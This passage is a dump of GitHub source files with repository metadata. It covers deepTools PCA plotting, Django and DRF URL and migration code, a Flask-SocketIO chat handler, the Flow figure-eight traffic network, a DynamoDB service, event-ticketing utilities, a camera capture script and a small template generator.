trace = go.Scatter(x=[Wt[PCs[0] - 1, i]],\n y=[Wt[PCs[1] - 1, i]],\n mode='marker',\n xaxis='x1',\n yaxis='y1',\n name=self.labels[i])\n trace['marker'].update(size=20)\n if cols is not None:\n trace['marker'].update(color=next(colors))\n data.append(trace)\n\n # Scree plot\n trace = go.Bar(showlegend=False,\n name='Eigenvalues',\n x=range(1, n + 1),\n y=eigenvalues[:n],\n xaxis='x2',\n yaxis='y2')\n data.append(trace)\n\n # Cumulative variability\n trace = go.Scatter(showlegend=False,\n x=range(1, n + 1),\n y=pvar.cumsum()[:n],\n mode='lines+markers',\n name='Cumulative variability',\n xaxis='x2',\n yaxis='y3',\n line={'color': 'red'},\n marker={'symbol': 'circle-open-dot', 'color': 'black'})\n data.append(trace)\n\n annos = []\n annos.append({'yanchor': 'bottom', 'xref': 'paper', 'xanchor': 'center', 'yref': 'paper', 'text': 'PCA', 'y': 1.0, 'x': 0.25, 'font': {'size': 16}, 'showarrow': False})\n annos.append({'yanchor': 'bottom', 'xref': 'paper', 'xanchor': 'center', 'yref': 'paper', 'text': 'Scree plot', 'y': 1.0, 'x': 0.75, 'font': {'size': 16}, 'showarrow': False})\n\n fig.add_traces(data)\n fig['layout']['annotations'] = annos\n offline.plot(fig, filename=plotFile, auto_open=False)\n\n def plot_pca(self, plot_filename=None, PCs=[1, 2], plot_title='', image_format=None, log1p=False, plotWidth=5, plotHeight=10, cols=None, marks=None):\n \"\"\"\n Plot the PCA of a matrix\n\n Returns the matrix of plotted values.\n \"\"\"\n fig, (ax1, ax2) = plt.subplots(2, 1, figsize=(plotWidth, plotHeight))\n\n # Filter\n m = self.matrix\n rvs = m.var(axis=1)\n if self.transpose:\n m = m[np.nonzero(rvs)[0], :]\n rvs = rvs[np.nonzero(rvs)[0]]\n if self.ntop > 0 and m.shape[0] > self.ntop:\n m = m[np.argpartition(rvs, -self.ntop)[-self.ntop:], :]\n rvs = rvs[np.argpartition(rvs, -self.ntop)[-self.ntop:]]\n\n # log2 (if requested)\n if self.log2:\n self.matrix = np.log2(self.matrix + 0.01)\n\n # Row center / transpose\n if self.rowCenter and not self.transpose:\n _ = self.matrix.mean(axis=1)\n self.matrix -= _[:, None]\n if self.transpose:\n m = m.T\n\n # Center and scale\n m2 = (m - np.mean(m, axis=0))\n m2 /= np.std(m2, axis=0, ddof=1) # Use the unbiased std. dev.\n\n # SVD\n U, s, Vh = np.linalg.svd(m2, full_matrices=False, compute_uv=True) # Is full_matrices ever needed?\n\n # % variance, eigenvalues\n eigenvalues = s**2\n variance = eigenvalues / float(np.max([1, m2.shape[1] - 1]))\n pvar = variance / variance.sum()\n\n # Weights/projections\n Wt = Vh\n if self.transpose:\n # Use the projected coordinates for the transposed matrix\n Wt = np.dot(m2, Vh.T).T\n\n if plot_filename is not None:\n n = n_bars = len(self.labels)\n if eigenvalues.size < n:\n n_bars = eigenvalues.size\n markers = itertools.cycle(matplotlib.markers.MarkerStyle.filled_markers)\n if cols is not None:\n colors = itertools.cycle(cols)\n else:\n colors = itertools.cycle(plt.cm.gist_rainbow(np.linspace(0, 1, n)))\n\n if marks is not None:\n markers = itertools.cycle(marks)\n\n if image_format == 'plotly':\n self.plotly_pca(plot_filename, Wt, pvar, PCs, eigenvalues, cols, plot_title)\n else:\n ax1.axhline(y=0, color=\"black\", linestyle=\"dotted\", zorder=1)\n ax1.axvline(x=0, color=\"black\", linestyle=\"dotted\", zorder=2)\n for i in range(n):\n color = next(colors)\n marker = next(markers)\n if isinstance(color, np.ndarray):\n color = pltcolors.to_hex(color, keep_alpha=True)\n ax1.scatter(Wt[PCs[0] - 1, i], Wt[PCs[1] - 1, i],\n marker=marker, color=color, s=150, label=self.labels[i], zorder=i + 3)\n if plot_title == '':\n ax1.set_title('PCA')\n else:\n ax1.set_title(plot_title)\n ax1.set_xlabel('PC{} ({:4.1f}% of var. explained)'.format(PCs[0], 100.0 * pvar[PCs[0] - 1]))\n ax1.set_ylabel('PC{} ({:4.1f}% of var. explained)'.format(PCs[1], 100.0 * pvar[PCs[1] - 1]))\n lgd = ax1.legend(scatterpoints=1, loc='center left', borderaxespad=0.5,\n bbox_to_anchor=(1, 0.5),\n prop={'size': 12}, markerscale=0.9)\n\n # Scree plot\n ind = np.arange(n_bars) # the x locations for the groups\n width = 0.35 # the width of the bars\n\n if mpl.__version__ >= \"2.0.0\":\n ax2.bar(2 * width + ind, eigenvalues[:n_bars], width * 2)\n else:\n ax2.bar(width + ind, eigenvalues[:n_bars], width * 2)\n ax2.set_ylabel('Eigenvalue')\n ax2.set_xlabel('Principal Component')\n ax2.set_title('Scree plot')\n ax2.set_xticks(ind + width * 2)\n ax2.set_xticklabels(ind + 1)\n\n ax3 = ax2.twinx()\n ax3.axhline(y=1, color=\"black\", linestyle=\"dotted\")\n ax3.plot(width * 2 + ind, pvar.cumsum()[:n], \"r-\")\n ax3.plot(width * 2 + ind, pvar.cumsum()[:n], \"wo\", markeredgecolor=\"black\")\n ax3.set_ylim([0, 1.05])\n ax3.set_ylabel('Cumulative variability')\n\n plt.subplots_adjust(top=3.85)\n plt.tight_layout()\n plt.savefig(plot_filename, format=image_format, bbox_extra_artists=(lgd,), bbox_inches='tight')\n plt.close()\n\n return Wt, eigenvalues\n","repo_name":"deeptools/deepTools","sub_path":"deeptools/correlation.py","file_name":"correlation.py","file_ext":"py","file_size_in_byte":28078,"program_lang":"python","lang":"en","doc_type":"code","stars":615,"dataset":"github-code","pt":"69"}
+{"seq_id":"72732698139","text":"import os\nimport glob\nimport textacy\nfrom .article_parser import ArticleParser\nfrom preprocess_text.document import Document\n\nclass WebhoseArticleParser(ArticleParser):\n def __init__(self, articles_directory):\n ArticleParser.__init__(self, articles_directory)\n self.json_article_files = glob.iglob(os.path.join(os.path.abspath(self.articles_dir), \"news*.json\"))\n\n def num_articles(self):\n return len(glob.glob1(os.path.join(os.path.abspath(self.articles_dir)), \"news*.json\"))\n\n def yield_articles(self):\n for article_filename in self.json_article_files:\n article_json = textacy.fileio.read.read_json(article_filename)\n content, metadata = textacy.fileio.utils.split_record_fields(article_json, \"text\")\n content_full = \"\"\n for line in content:\n content_full += line.encode('ascii', errors='replace').decode('ascii')\n metadata_full = {}\n for data in metadata:\n metadata_full = {**metadata_full, **data}\n yield Document(content_full, metadata=metadata_full, lang=\"en\")\n","repo_name":"ASethi77/StateOfTheMedia","sub_path":"src/preprocess_text/article_parsers/webhose_article_parser.py","file_name":"webhose_article_parser.py","file_ext":"py","file_size_in_byte":1110,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"69"}
+{"seq_id":"71751949979","text":"# -*- coding: utf-8 -*-\nfrom __future__ import unicode_literals\n\nfrom django.db import models, migrations\n\n\ndef description_to_classification(apps, schema_editor):\n Broadcast = apps.get_model('schedule', 'Broadcast')\n for broadcast in Broadcast.objects.all():\n broadcast.classification = broadcast.description\n broadcast.save()\n\n\nclass Migration(migrations.Migration):\n\n dependencies = [\n ('schedule', '0002_remove_broadcast_ending'),\n ]\n\n operations = [\n migrations.AddField(\n model_name='broadcast',\n name='classification',\n field=models.CharField(max_length=512, verbose_name='Classification', blank=True),\n ),\n migrations.RunPython(description_to_classification, migrations.RunPython.noop),\n migrations.RemoveField(\n model_name='broadcast',\n name='description',\n ),\n ]\n","repo_name":"GISAElkartea/amv2","sub_path":"antxetamedia/schedule/migrations/0003_auto_20150918_1019.py","file_name":"0003_auto_20150918_1019.py","file_ext":"py","file_size_in_byte":902,"program_lang":"python","lang":"en","doc_type":"code","stars":2,"dataset":"github-code","pt":"69"}
+{"seq_id":"30309934560","text":"from django.contrib import admin\nfrom django.urls import path, include, reverse_lazy\nfrom django.views.generic import RedirectView\n\nfrom rest_framework import permissions\nfrom drf_yasg.views import get_schema_view\nfrom drf_yasg import openapi\n\n\n# swagger documentation\nschema_view = get_schema_view(\n openapi.Info(\n title=\"Papelaria Hipo\",\n default_version='v1',\n description=\"Product sales management\",\n terms_of_service=\"#\",\n contact=openapi.Contact(email=\"bruno.tech@amcom.com\"),\n license=openapi.License(name=\"BSD License\"),\n ),\n public=True,\n permission_classes=(permissions.AllowAny,),\n)\n\nurlpatterns = [\n path('', RedirectView.as_view(url=reverse_lazy('schema-swagger-ui'), permanent=False), name='index'),\n path('admin/', admin.site.urls),\n path('api/v1/', include('apps.product.urls', namespace='products')),\n path('api/v1/', include('apps.seller.urls', namespace='sellers')),\n path('api/v1/', include('apps.customer.urls', namespace='customers')),\n path('api/v1/', include('apps.sale.urls', namespace='sales')),\n path('api/v1/swagger/', schema_view.with_ui('swagger', cache_timeout=0), name='schema-swagger-ui'),\n]\n","repo_name":"brunosp1024/papelaria-hipo","sub_path":"backend/setup/urls.py","file_name":"urls.py","file_ext":"py","file_size_in_byte":1184,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"69"}
+{"seq_id":"6404832537","text":"from .. import socketio\nfrom src.services.message_handler import MessageHandler\nfrom flask_socketio import join_room, leave_room\nfrom flask import session\n\n\nmessage_handler = MessageHandler()\n\n@socketio.on('read messages')\ndef read_messages(methods=['GET', 'POST']):\n content = message_handler.build_messages()\n socketio.emit('response event', content)\n\n@socketio.on('user connection')\ndef user_connected(json, methods=['GET', 'POST']):\n join_room('chat')\n # Avoid replacing the last user info by the current one.\n try:\n current_user = session[json['id']]\n except:\n session[json['id']] = json['user']\n\n@socketio.on('user disconnected')\ndef user_disconnected( methods=['GET', 'POST']):\n leave_room('chat')\n\n@socketio.on('message event')\ndef handle_messages(json, methods=['GET', 'POST']):\n json['user_name'] = session[json['id']]\n message_handler.process_payload(json)","repo_name":"IsacLira/stock-price-chatbot","sub_path":"src/main/events.py","file_name":"events.py","file_ext":"py","file_size_in_byte":908,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"69"}
+{"seq_id":"13129345771","text":"\"\"\"Contains the figure eight network class.\"\"\"\n\nimport numpy as np\nfrom numpy import pi, sin, cos, linspace\n\nfrom flow.core.params import InitialConfig\nfrom flow.core.params import TrafficLightParams\nfrom flow.networks.base import Network\n\nADDITIONAL_NET_PARAMS = {\n # radius of the circular components\n \"radius_ring\": 30,\n # number of lanes\n \"lanes\": 1,\n # speed limit for all edges\n \"speed_limit\": 30,\n # resolution of the curved portions\n \"resolution\": 40\n}\n\n\nclass FigureEightNetwork(Network):\n \"\"\"Figure eight network class.\n\n The figure eight network is an extension of the ring road network: Two\n rings, placed at opposite ends of the network, are connected by an\n intersection with road segments of length equal to the diameter of the\n rings. Serves as a simulation of a closed ring intersection.\n\n Requires from net_params:\n\n * **ring_radius** : radius of the circular portions of the network. Also\n corresponds to half the length of the perpendicular straight lanes.\n * **resolution** : number of nodes resolution in the circular portions\n * **lanes** : number of lanes in the network\n * **speed** : max speed of vehicles in the network\n\n Usage\n -----\n >>> from flow.core.params import NetParams\n >>> from flow.core.params import VehicleParams\n >>> from flow.core.params import InitialConfig\n >>> from flow.networks import FigureEightNetwork\n >>>\n >>> network = FigureEightNetwork(\n >>> name='figure_eight',\n >>> vehicles=VehicleParams(),\n >>> net_params=NetParams(\n >>> additional_params={\n >>> 'radius_ring': 50,\n >>> 'lanes': 75,\n >>> 'speed_limit': 30,\n >>> 'resolution': 40\n >>> },\n >>> )\n >>> )\n \"\"\"\n\n def __init__(self,\n name,\n vehicles,\n net_params,\n initial_config=InitialConfig(),\n traffic_lights=TrafficLightParams()):\n \"\"\"Initialize a figure 8 network.\"\"\"\n for p in ADDITIONAL_NET_PARAMS.keys():\n if p not in net_params.additional_params:\n raise KeyError('Network parameter \"{}\" not supplied'.format(p))\n\n ring_radius = net_params.additional_params[\"radius_ring\"]\n self.ring_edgelen = ring_radius * np.pi / 2.\n self.intersection_len = 2 * ring_radius\n self.junction_len = 2.9 + 3.3 * net_params.additional_params[\"lanes\"]\n self.inner_space_len = 0.28\n\n # # instantiate \"length\" in net params\n # net_params.additional_params[\"length\"] = \\\n # 6 * self.ring_edgelen + 2 * self.intersection_len + \\\n # 2 * self.junction_len + 10 * self.inner_space_len\n\n super().__init__(name, vehicles, net_params, initial_config,\n traffic_lights)\n\n def specify_nodes(self, net_params):\n \"\"\"See parent class.\"\"\"\n r = net_params.additional_params[\"radius_ring\"]\n\n nodes = [{\n \"id\": \"center\",\n \"x\": 0,\n \"y\": 0,\n \"radius\": (2.9 + 3.3 * net_params.additional_params[\"lanes\"])/2,\n \"type\": \"priority\"\n }, {\n \"id\": \"right\",\n \"x\": r,\n \"y\": 0,\n \"type\": \"priority\"\n }, {\n \"id\": \"top\",\n \"x\": 0,\n \"y\": r,\n \"type\": \"priority\"\n }, {\n \"id\": \"left\",\n \"x\": -r,\n \"y\": 0,\n \"type\": \"priority\"\n }, {\n \"id\": \"bottom\",\n \"x\": 0,\n \"y\": -r,\n \"type\": \"priority\"\n }]\n\n return nodes\n\n def specify_edges(self, net_params):\n \"\"\"See parent class.\"\"\"\n r = net_params.additional_params[\"radius_ring\"]\n resolution = net_params.additional_params[\"resolution\"]\n ring_edgelen = 3 * r * pi / 2.\n intersection_edgelen = 2 * r\n\n # intersection edges\n edges = [{\n \"id\": \"bottom\",\n \"type\": \"edgeType\",\n \"priority\": \"78\",\n \"from\": \"bottom\",\n \"to\": \"center\",\n \"length\": intersection_edgelen / 2\n }, {\n \"id\": \"top\",\n \"type\": \"edgeType\",\n \"priority\": 78,\n \"from\": \"center\",\n \"to\": \"top\",\n \"length\": intersection_edgelen / 2\n }, {\n \"id\": \"right\",\n \"type\": \"edgeType\",\n \"priority\": 46,\n \"from\": \"right\",\n \"to\": \"center\",\n \"length\": intersection_edgelen / 2\n }, {\n \"id\": \"left\",\n \"type\": \"edgeType\",\n \"priority\": 46,\n \"from\": \"center\",\n \"to\": \"left\",\n \"length\": intersection_edgelen / 2\n }]\n\n # ring edges\n edges += [{\n \"id\": \"upper_ring\",\n \"type\": \"edgeType\",\n \"from\": \"top\",\n \"to\": \"right\",\n \"length\": ring_edgelen,\n \"shape\": [(r * (1 - cos(t)), r * (1 + sin(t)))\n for t in linspace(0, 3 * pi / 2, resolution)]\n }, {\n \"id\": \"lower_ring\",\n \"type\": \"edgeType\",\n \"from\": \"left\",\n \"to\": \"bottom\",\n \"length\": ring_edgelen,\n \"shape\": [(-r + r * cos(t), -r + r * sin(t))\n for t in linspace(pi / 2, 2 * pi, resolution)]\n }]\n\n return edges\n\n def specify_types(self, net_params):\n \"\"\"See parent class.\"\"\"\n lanes = net_params.additional_params[\"lanes\"]\n speed_limit = net_params.additional_params[\"speed_limit\"]\n types = [{\n \"id\": \"edgeType\",\n \"numLanes\": lanes,\n \"speed\": speed_limit\n }]\n\n return types\n\n def specify_routes(self, net_params):\n \"\"\"See parent class.\"\"\"\n rts = {\n \"bottom\":\n [\"bottom\", \"top\", \"upper_ring\", \"right\", \"left\", \"lower_ring\"],\n \"top\":\n [\"top\", \"upper_ring\", \"right\", \"left\", \"lower_ring\", \"bottom\"],\n \"upper_ring\":\n [\"upper_ring\", \"right\", \"left\", \"lower_ring\", \"bottom\", \"top\"],\n \"left\":\n [\"left\", \"lower_ring\", \"bottom\", \"top\", \"upper_ring\", \"right\"],\n \"right\":\n [\"right\", \"left\", \"lower_ring\", \"bottom\", \"top\", \"upper_ring\"],\n \"lower_ring\":\n [\"lower_ring\", \"bottom\", \"top\", \"upper_ring\", \"right\", \"left\"],\n }\n\n return rts\n\n def specify_connections(self, net_params):\n \"\"\"See parent class.\"\"\"\n lanes = net_params.additional_params[\"lanes\"]\n conn_dict = {}\n conn = []\n for i in range(lanes):\n conn += [{\"from\": \"bottom\",\n \"to\": \"top\",\n \"fromLane\": str(i),\n \"toLane\": str(i)}]\n conn += [{\"from\": \"right\",\n \"to\": \"left\",\n \"fromLane\": str(i),\n \"toLane\": str(i)}]\n conn_dict[\"center\"] = conn\n return conn_dict\n\n def specify_edge_starts(self):\n \"\"\"See base class.\"\"\"\n edgestarts = [\n (\"bottom\", self.inner_space_len),\n (\"top\", self.intersection_len / 2 + self.junction_len +\n self.inner_space_len),\n (\"upper_ring\", self.intersection_len + self.junction_len +\n 2 * self.inner_space_len),\n (\"right\", self.intersection_len + 3 * self.ring_edgelen\n + self.junction_len + 3 * self.inner_space_len),\n (\"left\", 3 / 2 * self.intersection_len + 3 * self.ring_edgelen\n + 2 * self.junction_len + 3 * self.inner_space_len),\n (\"lower_ring\", 2 * self.intersection_len + 3 * self.ring_edgelen\n + 2 * self.junction_len + 4 * self.inner_space_len)]\n\n return edgestarts\n\n def specify_internal_edge_starts(self):\n \"\"\"See base class.\"\"\"\n internal_edgestarts = [\n (\":bottom\", 0),\n (\":center_{}\".format(self.net_params.additional_params['lanes']),\n self.intersection_len / 2 + self.inner_space_len),\n (\":top\", self.intersection_len + self.junction_len +\n self.inner_space_len),\n (\":right\", self.intersection_len + 3 * self.ring_edgelen\n + self.junction_len + 2 * self.inner_space_len),\n (\":center_0\", 3 / 2 * self.intersection_len + 3 * self.ring_edgelen\n + self.junction_len + 3 * self.inner_space_len),\n (\":left\", 2 * self.intersection_len + 3 * self.ring_edgelen\n + 2 * self.junction_len + 3 * self.inner_space_len),\n # for aimsun\n ('bottom_to_top',\n self.intersection_len / 2 + self.inner_space_len),\n ('right_to_left',\n + self.junction_len + 3 * self.inner_space_len),\n ]\n\n return internal_edgestarts\n","repo_name":"flow-project/flow","sub_path":"flow/networks/figure_eight.py","file_name":"figure_eight.py","file_ext":"py","file_size_in_byte":8953,"program_lang":"python","lang":"en","doc_type":"code","stars":978,"dataset":"github-code","pt":"69"}
+{"seq_id":"36040783188","text":"import boto3\n\n\nclass ProductService:\n\n def __int__(self):\n self.dynamo = boto3.client('dynamodb')\n\n def create_product(self, product: dict):\n self.dynamo.put_item(TableName='Product', Item=product)\n return {\n 'statusCode': 200,\n 'body': 'Successfully Created Product'\n }","repo_name":"dizipharm/tpapi","sub_path":"src/service/dynamo/product.py","file_name":"product.py","file_ext":"py","file_size_in_byte":322,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"69"}
+{"seq_id":"16464453451","text":"import requests\r\nimport itertools as it\r\nfrom Saman_arena import*\r\nfrom Eventos import Evento, Musical, Teatral\r\nfrom Productos import Productos, Comidas, Bedidas\r\nimport pickle\r\nimport os\r\n\r\n\r\ndef recibir_datos_del_txt(nombre_txt,datos): #Funcion para recibir los datos del archivo TXT\r\n \r\n lectura_binaria= open(nombre_txt,'rb')\r\n \r\n if os.stat(nombre_txt).st_size != 0:\r\n datos=pickle.load(lectura_binaria)\r\n\r\n lectura_binaria.close()\r\n\r\n return datos\r\n\r\n\r\n\r\ndef cargar_datos_en_txt(nombre_txt,datos): #Función para GUARDAR los datos en el archivo TXT\r\n\r\n escritura_binaria=open(nombre_txt,'wb')\r\n\r\n datos=pickle.dump(datos,escritura_binaria)\r\n \r\n escritura_binaria.close()\r\n\r\n\r\ndef make_request(url): #Función para llamar al API\r\n response = requests.get(url)\r\n return response\r\n\r\ndef validar_numero(msg): #Validar inputs numeros\r\n while True:\r\n num = input(msg)\r\n if num.isnumeric():\r\n num = int(num)\r\n break\r\n else:\r\n print('Error, valor ingresado no valido')\r\n print('')\r\n return num\r\n\r\ndef validar_palabra(msg): #Validar inputs palabras\r\n while True:\r\n word=input(msg)\r\n if word.replace(\" \",\"\").isalpha():\r\n break\r\n else:\r\n print(\"Error, valor ingresado no valido\")\r\n \r\n return word\r\n\r\ndef crear_bd(bd, bd_api, restablecer_bd): #Funcion que crea la base de datos local\r\n id_evento = 0\r\n for key, value in bd_api.items():\r\n if key == \"events\":\r\n for evento in value:\r\n id_evento += 1\r\n title = evento[\"title\"]\r\n tipo = evento[\"type\"]\r\n cartel = evento[\"cartel\"]\r\n fila_general = evento[\"layout\"][\"general\"][0]\r\n columna_general = evento[\"layout\"][\"general\"][1]\r\n tickets_general = fila_general * columna_general\r\n fila_vip = evento[\"layout\"][\"vip\"][0]\r\n columna_vip = evento[\"layout\"][\"vip\"][1]\r\n tickets_vip = fila_vip * columna_vip\r\n asientos_general = crear_matriz(fila_general, columna_general) #Se crea la matriz de los asientos generales\r\n asientos_vip = crear_matriz(fila_vip, columna_vip) #Se crea la matriz de los asientos vip \r\n price_general = evento[\"prices\"][0]\r\n price_vip = evento[\"prices\"][1]\r\n asiento = asientos(fila_general, columna_general, fila_vip, columna_vip, asientos_general, asientos_vip, tickets_general, tickets_vip, price_general, price_vip) #Se crea el objeto asiento para el evento\r\n date = evento[\"date\"]\r\n ingresos = 0\r\n apertura = True\r\n if evento['type'] == 1:\r\n bands = evento[\"bands\"]\r\n musical = Musical(title, tipo, cartel, asiento, date, ingresos, apertura, bands) #Se crea el objeto evento de tipo Musical\r\n bd[\"events\"][id_evento] = musical\r\n else:\r\n synopsis = evento[\"synopsis\"]\r\n teatral = Teatral(title, tipo, cartel, asiento, date, ingresos, apertura, synopsis) #Se crea el objeto evento de tipo Teatral\r\n bd[\"events\"][id_evento] = teatral\r\n elif key == \"food_fair_inventory\":\r\n iva = 0.16\r\n bd[\"products\"][\"Comidas\"] = [] #Reseteo de la lista de productos para cuando se deseee reestablcer la base de datos en su totalidad\r\n bd[\"products\"][\"Bebidas\"] = []\r\n for producto in value:\r\n if producto[\"type\"] == 1:\r\n name = producto[\"name\"]\r\n price = producto[\"price\"]\r\n aumento = price * iva\r\n final_price = price + aumento\r\n final_price = round(final_price, 2)\r\n amount = producto[\"amount\"]\r\n presentation = producto[\"presentation\"]\r\n amount_sell = 0\r\n comida = Comidas(name, amount, presentation, final_price, amount_sell)\r\n bd[\"products\"][\"Comidas\"].append(comida)\r\n restablecer_bd[\"products\"][\"Comidas\"].append(comida)\r\n else:\r\n name = producto[\"name\"]\r\n prices = producto[\"price\"]\r\n final_price = []\r\n for price in prices:\r\n aumento = price * iva\r\n new_price = price + aumento\r\n new_price = round(new_price, 2)\r\n final_price.append(new_price)\r\n little_price = final_price[0]\r\n middle_price = final_price[1]\r\n big_price = final_price[2]\r\n amount = producto[\"amount\"]\r\n divider_amount = amount // 3\r\n little_amount = divider_amount\r\n middle_amount = divider_amount\r\n big_amount = divider_amount\r\n amount_sell = 0\r\n bebida = Bedidas(name, amount, little_amount, middle_amount, big_amount, little_price, middle_price, big_price, amount_sell)\r\n bd[\"products\"][\"Bebidas\"].append(bebida)\r\n restablecer_bd[\"products\"][\"Bebidas\"].append(bebida)\r\n bd[\"clients\"] = {} #Reseteo del diccionario clientes para cuando se desee reestablecer la base de datos en su totalidad\r\n return bd, restablecer_bd\r\n\r\n\r\n\r\ndef es_narcisista(numero): #Codigo tomado de: https://parzibyte.me/blog/2018/10/02/numero-narcisista-python/\r\n numero_como_cadena = str(numero)\r\n longitud_de_numero = len(numero_como_cadena)\r\n suma = 0\r\n for letra in numero_como_cadena:\r\n # Convertir carácter a entero\r\n cifra_actual = int(letra)\r\n\r\n # Elevar ese carácter a la potencia dada por la longitud del número\r\n elevado = pow(cifra_actual, longitud_de_numero)\r\n\r\n # El resultado lo añadimos a suma\r\n suma = suma + elevado\r\n # Comprobar si la suma al elevar es igual al número que recibimos\r\n if numero == suma:\r\n return True\r\n else:\r\n return False\r\n\r\ndef get_vampire(num): #Codido tomado de: https://www.geeksforgeeks.org/vampire-number/\r\n\r\n def getFangs(num_str):\r\n \r\n num_iter = it.permutations(num_str, len(num_str))\r\n \r\n for num_list in num_iter:\r\n \r\n v = ''.join(num_list)\r\n x, y = v[:int(len(v)/2)], v[int(len(v)/2):]\r\n \r\n if x[-1] == '0' and y[-1] == '0':\r\n continue\r\n \r\n \r\n if int(x) * int(y) == int(num_str):\r\n return x,y\r\n return False\r\n \r\n \r\n n_str = str(num)\r\n \r\n \r\n if len(n_str) % 2 == 1:\r\n return False\r\n \r\n\r\n fangs = getFangs(n_str)\r\n if not fangs:\r\n return False\r\n return True\r\n","repo_name":"GAUGUSTO1602/Proyecto_python","sub_path":"Proyecto/utils.py","file_name":"utils.py","file_ext":"py","file_size_in_byte":6952,"program_lang":"python","lang":"es","doc_type":"code","stars":0,"dataset":"github-code","pt":"69"}
+{"seq_id":"38365766383","text":"from django.urls import include, path\n\nfrom .views import (\n SearchVideo,\n AllVideos,\n GetVideo,\n CreateVideo,\n DeleteVideo,\n UpdateVideo,\n LikeVideo,\n CreateComment,\n VideoComments,\n SubscribeVideoChannel,\n SubscribeChannelCheck,\n SubscribedVideos,\n UserVideos,\n RelatedVideos,\n DiscoverVideos,\n MostWatchedVideos,\n Trending,\n MostPopular,\n ForYou,\n WebPushTokens,\n)\n\n\napp_name = \"main\"\n\nfrom rest_framework.routers import DefaultRouter, SimpleRouter\n\nrouter = SimpleRouter()\nrouter.register(r\"tokens\", WebPushTokens)\n\n\nurlpatterns = [\n path(\"search/video//\", SearchVideo.as_view(), name=\"search_video\"),\n path(\"all_videos/\", AllVideos.as_view(), name=\"all_videos\"),\n path(\"get_video//\", GetVideo.as_view(), name=\"get_video\"),\n path(\"create_video/\", CreateVideo.as_view(), name=\"create_video\"),\n path(\"delete_video//\", DeleteVideo.as_view(), name=\"delete_video\"),\n path(\"update_video//\", UpdateVideo.as_view(), name=\"update_video\"),\n path(\"related_videos//\", RelatedVideos.as_view(), name=\"related_videos\"),\n path(\"like_video//\", LikeVideo.as_view(), name=\"like_video\"),\n path(\"create_comment/\", CreateComment.as_view(), name=\"create_comment\"),\n path(\"video_comments//\", VideoComments.as_view(), name=\"video_comments\"),\n path(\n \"subscribe_channel//\",\n SubscribeVideoChannel.as_view(),\n name=\"subscribe_channel\",\n ),\n path(\n \"check_channel//\",\n SubscribeChannelCheck.as_view(),\n name=\"check_channel\",\n ),\n path(\"subscribed_videos/\", SubscribedVideos.as_view(), name=\"subscribed_videos\"),\n path(\"user_videos/\", UserVideos.as_view(), name=\"user_videos\"),\n path(\"discover_videos/\", DiscoverVideos.as_view(), name=\"discover_videos\"),\n path(\"most_watched/\", MostWatchedVideos.as_view(), name=\"most_watched\"),\n path(\"trending/\", Trending.as_view(), name=\"trending\"),\n path(\"most_popular/\", MostPopular.as_view(), name=\"most_popular\"),\n path(\"for_you/\", ForYou.as_view(), name=\"for_you\"),\n path(\"web_push/\", include(router.urls)),\n]\n","repo_name":"Doszhan-M/VideoHub","sub_path":"backend/backend/main/urls.py","file_name":"urls.py","file_ext":"py","file_size_in_byte":2169,"program_lang":"python","lang":"en","doc_type":"code","stars":2,"dataset":"github-code","pt":"69"}
+{"seq_id":"20446280269","text":"\n\"\"\"\n拍照脚本\n\"\"\"\n\n\nimport cv2\nfrom MatrixHands.camera.camera import Camera\nimport winsound\nfrom MatrixHands.config import Config\nimport time\n\n\nif __name__ == \"__main__\":\n\n # 视频对象\n left_camera = Camera(Config[\"double_camera\"][0])\n right_camera = Camera(Config[\"double_camera\"][1])\n\n\n # 预计拍照时间(负数,绝对值越大,第一张图片等待时间越长)\n count = -200\n\n # 拍摄间隔(越大,间隔越大)\n wait = 60\n\n while True:\n\n # 获取一帧图片,两张图片,一左一右\n left_image, right_image = left_camera(), right_camera()\n\n\n # 显示\n cv2.imshow(\"Left Video\", left_image)\n cv2.imshow(\"Right Video\", right_image)\n\n count += 1\n\n if count == 60:\n count = 0\n # 用当前的时间戳命名\n name = str(time.time()) + \".jpg\"\n cv2.imwrite(\"../images/left/\" + name, left_image)\n cv2.imwrite(\"../images/right/\" + name, right_image)\n winsound.Beep(400, 300)\n print(name, \"已保存\")\n\n cv2.waitKey(1)\n","repo_name":"Magic-Matrix/MatrixVersion","sub_path":"script/photograph.py","file_name":"photograph.py","file_ext":"py","file_size_in_byte":1102,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"69"}
+{"seq_id":"38119397354","text":"# 全数据模板\nd = {\n 'jinjia':{\"id\":'employeelist',\n \"name\": 'employeelist',\n \"css\":'table table-hover table-bordered',},\n 'route':{},\n 'data':{},\n\n \"colnames\": [],\n \"lang\":[],\n \"step\": 5,\n \"pages\": 1,\n \"data\":[]\n}\nimport sys,os\ne=os.getcwd()\ne3=os.walk(e)\nd=next(e3)\nos.path.join(d[0],d[1][3])\nclass Thebest():\n Jinjiadir=os.path.join(d[0],d[1][3])\n Routedir=e\n Database=e\n def __init__(self):\n pass\n method='GET'\n host='127.0.0.1'\n path='/'.join(e.split('\\\\'))\n file='testData.py'\n self.url='{} {}/{}/{}'.format(method,host,path,file)\n def createJinjia(self):\n n=1\n head='{{% block body{:02d} %}}'.format(n)\n last='{% endblock %}'\n print(head)\n text='测试资源'\n default='{} '.format(self.url,text)\n with open(os.path.join(self.Jinjiadir,'testjinjia.html'),'a',encoding='utf8') as f:\n f.write(head+default+last)\n def createRoute(self):\n with open(os.path.join(self.Routedir,'api.py'),'a',encoding='utf8') as f:\n f.write('')\n def createDatabase(self):\n with open(os.path.join(self.Database,'testDate.py'),'a',encoding='utf8') as f:\n f.write('')\n\nif __name__=='__main__':\n print(Thebest.Jinjiadir)\n print(Thebest.Routedir)\n print(Thebest.Database)\n t=Thebest()\n t.createDatabase()\n t.createJinjia()\n t.createRoute()\n","repo_name":"wangzheng62/CRMverson02","sub_path":"thebest.py","file_name":"thebest.py","file_ext":"py","file_size_in_byte":1469,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"69"}
